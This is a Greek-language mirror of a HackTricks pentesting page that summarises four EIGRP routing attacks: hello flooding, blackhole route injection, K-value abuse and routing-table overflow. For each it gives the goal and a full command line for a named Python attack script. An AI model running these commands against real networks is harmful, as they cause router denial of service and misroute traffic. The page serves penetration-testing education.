mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
5.2 KiB
5.2 KiB
Επιθέσεις EIGRP
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Αυτό είναι ένα σύνοψη των επιθέσεων που παρουσιάζονται στο https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Ελέγξτε το για περαιτέρω πληροφορίες.
Επίθεση Ψεύτικων Γειτόνων EIGRP
- Στόχος: Να υπερφορτωθούν οι επεξεργαστές του δρομολογητή με πλημμύρα πακέτων hello EIGRP, με δυνητική αποτυχία υπηρεσίας (DoS) επίθεση.
- Εργαλείο: Σενάριο helloflooding.py.
- Εκτέλεση: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
- Παράμετροι:
--interface
: Καθορίζει τη δικτυακή διεπαφή, π.χ.,eth0
.--as
: Ορίζει τον αυτόνομο αριθμό EIGRP, π.χ.,1
.--subnet
: Ορίζει την τοποθεσία του υποδικτύου, π.χ.,10.10.100.0/24
.
Επίθεση EIGRP Blackhole
- Στόχος: Να διαταραχθεί η ροή της κυκλοφορίας δικτύου με την εισαγωγή ενός ψεύτικου δρομολογίου, οδηγώντας σε ένα μαύρο τρύπα όπου η κυκλοφορία απευθύνεται σε μια μη υπαρκτή προορισμό.
- Εργαλείο: Σενάριο routeinject.py.
- Εκτέλεση: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
- Παράμετροι:
--interface
: Καθορίζει τη διεπαφή του επιτιθέμενου συστήματος.--as
: Ορίζει τον αριθμό AS του EIGRP.--src
: Ορίζει τη διεύθυνση IP του επιτιθέμενου.--dst
: Ορίζει τη διεύθυνση IP του στόχου του υποδικτύου.--prefix
: Ορίζει τη μάσκα της διεύθυνσης IP του στόχου του υποδικτύου.
Επίθεση Κατάχρησης των K-Values
- Στόχος: Να δημιουργηθούν συνεχείς διακοπές και επανασυνδέσεις εντός του τομέα EIGRP με την εισαγωγή τροποποιημένων τιμών K, με αποτέλεσμα μια επίθεση DoS.
- Εργαλείο: Σενάριο relationshipnightmare.py.
- Εκτέλεση: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
- Παράμετροι:
--interface
: Καθορίζει τη δικτυακή διεπαφή.--as
: Ορίζει τον αριθμό AS του EIGRP.--src
: Ορίζει τη διεύθυνση IP ενός νόμιμου δρομολογητή.
Επίθεση Υπερχείλισης του Πίνακα Δρομολόγησης
- Στόχος: Να φορτωθούν οι επεξεργαστές και η μνήμη του δρομολογητή με πλημμύρα ψευδών δρομολογήσεων.
- Εργαλείο: Σενάριο routingtableoverflow.py.
- Εκτέλεση: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
- Παράμετροι:
--interface
: Καθορίζει τη δικτυακή διεπαφή.--as
: Ορίζει τον αριθμό AS του EIGRP.--src
: Ορίζει τη διεύθυνση IP του επιτιθέμενου.